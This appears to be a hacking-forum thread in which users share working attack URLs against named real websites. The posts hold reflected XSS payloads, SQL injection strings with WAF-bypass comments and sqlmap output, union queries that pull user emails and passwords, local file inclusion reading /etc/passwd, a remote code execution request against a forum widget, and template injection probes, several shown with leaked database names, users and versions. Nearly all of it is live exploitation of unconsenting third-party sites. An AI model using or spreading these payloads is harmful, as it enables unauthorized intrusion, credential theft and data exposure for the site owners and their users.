Code: https://www.edmunds.com/a/?":""});alert(document.cookie);// http://oregonstate.edu/training/course_search.php?subject="><script>alert(999)</script> https://lyricstranslate.com/?page="><script>alert(7889789)</script> http://720pizle.com/ara.asp?a="><script>alert(7889789)</script> http://epinions.com/search/books/63715?"><script>alert(6456456)</script> https://mgronline.com/south/1232/search?searchTxt="><script>alert(045839)</script> http://naszemiasto.pl/firmy/,polska,78425,21.html?miasto="><script>alert(4389)</script> http://www3.gogoanime.tv/"><script>alert(4389)</script> https://bursadabugun.com/ruya-tabirleri/?q[keyword]="><script>alert(4389)</script> https://computerhoy.com/listas/internet/mejores-cascos-auriculares-inalambricos-2016-32365?page=</title><script>alert(4389)</script> https://warframe.market/</script><script>alert(4389)</script> https://goal.in.th/%E0%B8%9C%E0%B8%A5%E0%B8%9A%E0%B8%AD%E0%B8%A5%E0%B8%A2%E0%B9%89%E0%B8%AD%E0%B8%99%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%87/?Line="><script>alert(4389)</script> http://www.gazetevatan.com/Default.aspx?aType=';alert();// http://thebitcoincode.com/video.php?poster="><script>alert(4389)</script> https://gamebanana.com/tools?"><script>alert(4389)</script> https://indosport.com/"><script>alert(4389)</script> http://brasilescola.uol.com.br/"><script>alert(4389)</script> https://watchasian.co/"><script>alert(4389)</script> https://mgronline.com/south/1232/search?searchTxt="><script>alert(4389)</script> http://portail.free.fr/services/pagesjaunes/bons-plans.php?where="><script>alert(4389)</script> http://minnstate.edu/jobs/searchResults.php?"><script>alert(4389)</script> https://eadaily.com/"><script>alert(00088)</script> http://projectfreetv.bz/hd/project.php?title=<script>alert(4389)</script> http://cnrtl.fr/lexiques/morphalou/licence_morphalou.php?version="><script>alert(4389)</script>
Code: http://wrestling.work/eventchapter.php?id=2%27+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(tione_igs.applications)where(0x00)in(@x:=concat(@x,0x3c62723e,user,0x3a,pass))))x),4,5,6,7,8,9,10--+1
Code: http://cpa-monsters.ru/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW Spoiler: from sqlmap Parameter: #1* (URI) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: http://cpa-monsters.ru:80/" AND MAKE_SET(1782=1782,4508) AND "lURK"="lURK Vector: AND MAKE_SET([INFERENCE],[RANDNUM]) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://cpa-monsters.ru:80/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (comment) Payload: http://cpa-monsters.ru:80/";SELECT SLEEP(5)# Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: http://cpa-monsters.ru:80/" AND SLEEP(5) AND "IisV"="IisV Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) Spoiler: bd available databases [110]:
Hello) First day on the forum, I'll give it a try too.
1. SQL injection with WAF bypass
Code:
GET /noticia.php?id=-738+/*!50000union*/+/*!50000select*/+111,222,/*!50000gROup_cONcat(table_name,0x0a)%20*/,444,555,666,777,888,999,1010,1111,1212,1313,1414,1515,1616,1717+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+ HTTP/1.1
Host: www.cdlmacapa.com.br
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
2. SQL injection with output in the error message
Code:
http://steelflex.com.br/subcategoria.php?id=1+AND+extractvalue(1,concat(0x3a,(select+user()+limit+0,1)))
A bit more, now LFI.
Code:
http://www.unisescon.org.br/index.php?pagina=/etc/passwd&evento=13774
https://www.fecic.es/admin/index.php?pagina=descargar&doc=../../../../../../../../../../../../etc/passwd&linial=true&seccio=premsa&tipus=1&[email protected]
http://www.bolyai-zenta.edu.rs/index.php?page=../../../../../../../../../../../etc/passwd
http://www.crt.unige.it/EN/index.php?pagina=php://filter/convert.base64-encode/resource=/etc/passwd
Code: https://www.bible-history.com/subcat.php?id=-1%20union%20all%20select%20user()%20--%20 rusty@localhost 5.5.62 bible_history
XSS
1) https://elkomp.ru/search?sought=<script>alert('xss')</script>
2) https://kubnews.ru/poisk/?q=<script>alert('xss')</script>
3) http://ivgoradm.ru/find=<script>alert('xss')</script>
4) https://www.lapsi.ru/list.php?q=<script>alert('xss')</script>
5) http://brykury.com.ua/products/search?search=<script>alert('xss')</script>
SQLi: SoftwareOnRent Code: http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5,6,concat_ws(0x7c,database(),%20user(),version()),8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+&catid=1&compid=135 SOR|SORuser@localhost|5.5.56-MariaDB Code: http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5,6,group_concat(column_name),8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27--+&catid=1&compid=135 SecurityDealOnline Code: http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%20concat_ws(0x7c,database(),version()))))--+ bluewings|bluewings1@localhost|5.6.39-cll-lve Code: http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20)))--+ BrandTagz Code: http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,concat_ws(%27|%27,%20database(),user(),version()),3,4,5,6,7,8,9,10,11--+&&product=Dress%20Shirts [brandtag|brandtag@localhost|5.6.39-cll-lve] Code: http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,%20group_concat(concat_ws(':',email, password),0x0a),3,4,5,6,7,8,9,10,11%20from user--+&&product=Dress%20Shirts
Rcadia
Code:
http://www.rcadia.com/page.php?pageID=-23%20union%20select%2012,3,4,5,concat_ws(0x7c,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19
[email protected]|rcadia2|5.6.34-log
City council, Cherkasy
Code:
http://chmr.gov.ua/myrada/html/195784.php?id=-195784%20/*!50000uNioN*/%20select%20concat_ws(0x7c, database(),user(),version())--+
myrada|myrada@ns1|5.5.24-log
Indian shop
Code:
https://www.royalenterprises.co.in/category.php?cid=9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
myp13eyd_royal2|myp13eyd_royal2@localhost|5.6.32-78.1
Code:
https://www.royalenterprises.co.in/category.php?cid=-9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18 from /*!50000infoRmAtiOn_sChEma*/.tables+/*!50000WhErE*/+/*!50000table_schema*/=database()--+#
way.com Code: https://shuttle.way.com/waypanel/drivers/track-drivers-by-parking.php?pid=844 Parameter: pid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=844' AND 3141=3141 AND 'gxfZ'='gxfZ Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: pid=844' AND SLEEP(5) AND 'tJKn'='tJKn --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 Code: http://www.alicetinting.com.au/pop.php?ID=37 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178766271,(SELECT (ELT(8597=8597,1))),0x716a707171,0x78))s), 8446744073709551610, 8446744073709551610)))
rce (= Spoiler: oops шттп://www.t| u | torialspoint.com/ Stat on similarweb =) PoC Spoiler: query with params Code: from base64
ZoneAlarm Code: https://forums.zonealarm.com/ajax/render/widget_php POST: widgetConfig[code]=phpinfo();
Blind XSS in the Hostinger admin panel, sorry for the RU site https://crm.hostinger.io/client/29640132 PS: Reported it, they said thanks and extended my hosting by one month
There's a carder who stole $36 million and served 10 years; he now has a YouTube channel, "Люди PRO", I watch it myself ) He has his own cashback service, in which I found a server-side template injection in about 5 minutes, though I couldn't get a payload to output ( https://secretdiscounter.com/ru/search/coupon?limit=30&query={{7*7}}. + XSS https://secretdiscounter.com/ru/"//><script>alert(5)</script>
General Inspectorate for Emergency Situations Code: https://www.igsu.ro/index.php?pagina=materiale_preventive%3E%3Cscript%3Ealert(666)%3C/script%3E
Promotora Española de Lingüística (Proel) Code: http://www.proel.org/index.php?sw=%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&pagina=searchresult